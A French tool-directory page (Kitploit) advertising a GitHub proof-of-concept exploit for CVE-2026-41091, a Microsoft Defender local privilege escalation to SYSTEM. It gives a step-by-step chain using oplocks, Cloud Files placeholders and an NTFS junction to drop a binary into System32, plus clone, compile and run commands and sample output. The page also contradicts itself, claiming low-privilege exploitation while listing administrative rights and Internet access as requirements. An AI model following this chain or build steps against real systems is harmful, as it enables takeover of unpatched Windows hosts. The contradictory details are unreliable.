Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-41091-PoC-Exploit — CVE-2026-41091 RedSun | Exploit LPE Microsoft Defender. Les utilisateurs à faibles privilèges obtiennent NT AUTHORITY\SYSTEM 🔥 via l'API Cloud Files + manipulation de jonctions NTFS. Force Defender à écrire des charges malveillantes dans System32 avec les droits SYSTEM. ⚠️ Activement exploitée dans la nature. CVSS 7.8. Correctif : Defender Engine 1.1.26040.8. 🛡️ PoC pédagogique uniquement. | Kitploit
Outils/GitHubGitHub/tc4dy/cve-2026-41091-poc-exploit
Escalade de PrivilègesAnalyse des VulnérabilitésExploitationPost-ExploitationApprentissage et ÉducationDéveloppement de Charges UtilesExploitation de Binaires
GitHubtc4dy/cve-2026-41091-poc-exploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

CVE-2026-41091-PoC-Exploit

Voir le dépôt
3il y a 1 moisPas encore vérifié

À propos

CVE-2026-41091 RedSun | Exploit LPE Microsoft Defender. Les utilisateurs à faibles privilèges obtiennent NT AUTHORITY\SYSTEM 🔥 via l'API Cloud Files + manipulation de jonctions NTFS. Force Defender à écrire des charges malveillantes dans System32 avec les droits SYSTEM. ⚠️ Activement exploitée dans la nature. CVSS 7.8. Correctif : Defender Engine 1.1.26040.8. 🛡️ PoC pédagogique uniquement.

Partager

SolarFlare

☀️ CVE-2026-41091 - RedSun (SolarFlare) - Exploit LPE Microsoft Defender

C++ Windows License CVSS CISA KEV

Vulnérabilité de suivi de lien Microsoft Defender - Élévation de privilèges locale vers NT AUTHORITY\SYSTEM

La vulnérabilité est connue sous le nom de « RedSun » 🎯, « SolarFlare » est le nom que j'ai donné à mon exploit. ✅

📌 Aperçu

Ce dépôt contient un exploit PoC complet et fonctionnel pour CVE-2026-41091, une vulnérabilité critique d'élévation de privilèges locale dans Microsoft Defender (Microsoft Malware Protection Engine). En exploitant une résolution de lien inappropriée (CWE-59), un attaquant authentifié disposant de privilèges limités peut obtenir les privilèges NT AUTHORITY\SYSTEM.

La vulnérabilité, également connue sous le nom de « RedSun » ou « SolarFlare », permet à un attaquant de tromper Microsoft Defender afin qu'il écrive des fichiers arbitraires dans des emplacements système protégés avec les privilèges SYSTEM en utilisant l'API Cloud Files (CfAPI) et des points de jonction NTFS.

Remarque : Ce dépôt comprend deux versions :

  • basic_poc.cpp - Démonstration simplifiée de l'algorithme (pédagogique)
  • full_poc.cpp - Exploit complet et fonctionnel avec toutes les fonctionnalités

🔥 Fonctionnalités clés

🎯 Détails de la vulnérabilité

📦 Produits concernés

ProduitVersions concernéesVersions corrigées
Microsoft Malware Protection Engine< 1.1.26040.81.1.26040.8+
Microsoft Defender Antimalware Platform< 4.18.26040.74.18.26040.7+

🔬 Chaîne d'exploitation

root@kitploit:~
┌─────────────────────────────────────────────────────────────────────────────┐
│ SOLARFLARE EXPLOIT CHAIN                                                    │
├─────────────────────────────────────────────────────────────────────────────┤
│                                                                              │
│ 1. Create Working Directory                                                 │
│    └─> %TEMP%\SF-XXXX\                                                      │
│                                                                              │
│ 2. Trigger Defender with EICAR                                              │
│    └─> Write reversed EICAR to bait file                                    │
│                                                                              │
│ 3. Wait for VSS Snapshot                                                    │
│    └─> Detect Volume Shadow Copy creation                                   │
│                                                                              │
│ 4. Create First Batch Oplock                                                │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK on bait file                              │
│                                                                              │
│ 5. Wait for Oplock Break                                                    │
│    └─> Acquire exclusive access                                             │
│                                                                              │
│ 6. Rename Directory                                                         │
│    └─> Move original directory to .tmp                                      │
│                                                                              │
│ 7. Register Cloud Sync Root                                                 │
│    └─> CfRegisterSyncRoot with Cloud Files API                              │
│                                                                              │
│ 8. Create Cloud Placeholder                                                 │
│    └─> CfCreatePlaceholders for bait file                                   │
│                                                                              │
│ 9. Create Second Batch Oplock                                               │
│    └─> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder                      │
│                                                                              │
│ 10. Wait for Second Oplock Break                                            │
│     └─> Acquire exclusive access                                            │
│                                                                              │
│ 11. Rename Cloud Directory                                                  │
│     └─> Move cloud directory to .cloud.tmp                                  │
│                                                                              │
│ 12. Create NTFS Junction to System32                                        │
│     └─> Redirect to C:\Windows\System32                                     │
│                                                                              │
│ 13. Copy Payload to System32                                                │
│     └─> Copy bait file to System32 as TieringEngineService.exe              │
│                                                                              │
│ 14. Activate Service as SYSTEM                                              │
│     └─> CoCreateInstance(StorageTiersManagement)                            │
│                                                                              │
└─────────────────────────────────────────────────────────────────────────────┘

📦 Installation

Prérequis

  • Windows 10/11 ou Windows Server 2019/2022
  • Visual Studio 2019/2022 avec les outils C++
  • Privilèges administratifs (pour l'exécution)

Compilation

root@kitploit:~
# Clone the repository
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit

# Build using Visual Studio Developer Command Prompt
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Or build basic version
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

🛠️ Utilisation

Exploit complet (élévation de privilèges SYSTEM)

root@kitploit:~
full_poc.exe

Démonstration de l'algorithme de base

root@kitploit:~
basic_poc.exe

📋 Exemple de sortie

Sortie de l'exploit complet

root@kitploit:~
CVE-2026-41091 SolarFlare PoC
===============================
     by @tc4dy | CVSS 7.8
===============================

[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM

[+] SYSTEM access obtained!

Sortie du PoC de base

root@kitploit:~
CVE-2026-41091 Basic PoC
========================================
  Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe

[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.

🔧 Instructions de compilation

Avec Visual Studio

  1. Ouvrez l'invite de commandes développeur pour VS 2022
  2. Accédez au répertoire de l'exploit
  3. Exécutez :
root@kitploit:~
# Full exploit
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib

# Basic PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib

Avec CMake

root@kitploit:~
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)

set(CMAKE_CXX_STANDARD 17)

add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)

add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)

⚠️ Exigences et limites

🔗 Exploits associés

Découvrez mes autres dépôts d'exploits :

  • CVE-2026-24061-PoC-Exploit - Contournement d'authentification GNU inetutils-telnetd
  • CVE-2026-41940-PoC-Exploit - Exploit de contournement d'authentification cPanel/WHM
  • CVE-2026-0073-PoC-Exploit - Contournement d'authentification du débogage sans fil ADB Android
Télécharger l’outil
CatégorieFonctionnalités
Exploitation✅ Élévation de privilèges locale vers SYSTEM
✅ Intégration de l'API Cloud Files (CfAPI)
✅ Création de placeholder cloud
✅ Redirection de jonction NTFS
Techniques✅ Abus d'oplock batch
✅ Détection de snapshot VSS
✅ Déclencheur EICAR
✅ Activation du service COM
Cible✅ Microsoft Defender < 1.1.26040.8
✅ Windows 10/11
✅ Windows Server 2019/2022
Utilisation✅ Journalisation détaillée
✅ Gestion des erreurs
✅ Noms de répertoires aléatoires
✅ Nettoyage automatique
AttributValeur
CVE IDCVE-2026-41091
Score CVSS7.8 (Élevé)
Vecteur CVSSAV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Vecteur d'attaqueLocal
Privilèges requisFaibles
Interaction utilisateurAucune
ImpactExécution de code au niveau SYSTEM
CISA KEV✅ Oui (exploité activement dans la nature)
Correctif disponibleMicrosoft Malware Protection Engine 1.1.26040.8
ExigenceDétails
Système d'exploitationWindows 10/11, Server 2019/2022
PrivilègesAdministratifs (pour l'exécution)
DefenderMicrosoft Defender doit être activé
InternetRequis pour la détection de snapshot VSS
CorrectifFonctionne uniquement sur les systèmes non corrigés
Architecturex64 uniquement